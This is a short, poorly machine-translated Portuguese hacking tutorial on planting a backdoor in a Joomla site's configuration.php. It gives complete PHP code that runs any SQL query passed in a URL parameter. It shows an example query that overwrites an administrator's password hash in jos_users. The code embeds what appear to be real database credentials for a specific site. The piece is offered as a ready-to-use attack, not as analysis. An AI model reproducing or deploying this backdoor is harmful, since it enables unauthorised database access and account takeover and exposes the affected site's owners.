Instalando Backdoor Em Mysql

Neste artigo vou mostrar como instalar e executar o backdoor no comando e fazer o upload shell

1.First você precisa shell e editar arquivo configuration.php

Por exemplo: http://www.website.com

2. editar configuration.php arquivo e adicionar a este código de usuário e passar e .. ao código-fonte de Down


3. salvar arquivo configuration.php


4. arquivo de configuração aberta e barra de endereços e adicione o endereço esse código? cmd = mysql & query =

Por exemplo: http://www.site.com/configuration.php?cmd=mysql&query =

5. você pode atualizar o banco de dados mysql e comando executado
Por exemplo: http://www.site.com/configuration.php?cmd=mysql&query = SELECT * FROM jos_users atualização jos_users senha set = 'eae778eac6f9a329d3423880227d5dda: xZmZbqy XTL3ho2p0vFKPJHRMvWM5KpFa' where id = 62

<?php
if ($_GET['cmd']=='mysql')
{

$dbhost = "localhost";
$dbname = "thegapuc_gapuc";
$dbuser = "thegapuc_admin";
$dbpasswd = "GaPuc1050W";

if(get_magic_quotes_gpc())
$query = stripslashes($_GET['query']);
else
$query = $_GET['query'];

$dbh = mysql_connect($dbhost, $dbuser, $dbpasswd) or die("Unable to connect to MySQL Server");
$selected = mysql_select_db($dbname,$dbh);
$result = mysql_query($query);

if(!$result) die("Nothing Returned.<br><br>" . mysql_error());

// results
echo "<html>\r\n". strtoupper($query) . "<br>\r\n<table border =\"1\">\r\n";

$count = 0;
while ($row = mysql_fetch_assoc($result))
{
echo "<tr>\r\n";

if ($count==0) // list column names
{
echo "<tr>\r\n";
while($key = key($row))
{
echo "<td><b>" . $key . "</b></td>\r\n";
next($row);
}
echo "</tr>\r\n";
}

foreach($row as $r) // list content of column names
{
if ($r=='') $r = '<font color=red>NULL</font>';
echo "<td>" . $r . "</td>\r\n";
}
echo "</tr>\r\n";
$count++;
}
echo "</table>\n\r" . $count . " rows returned.\r\n</html>";
}
?>

Thanks..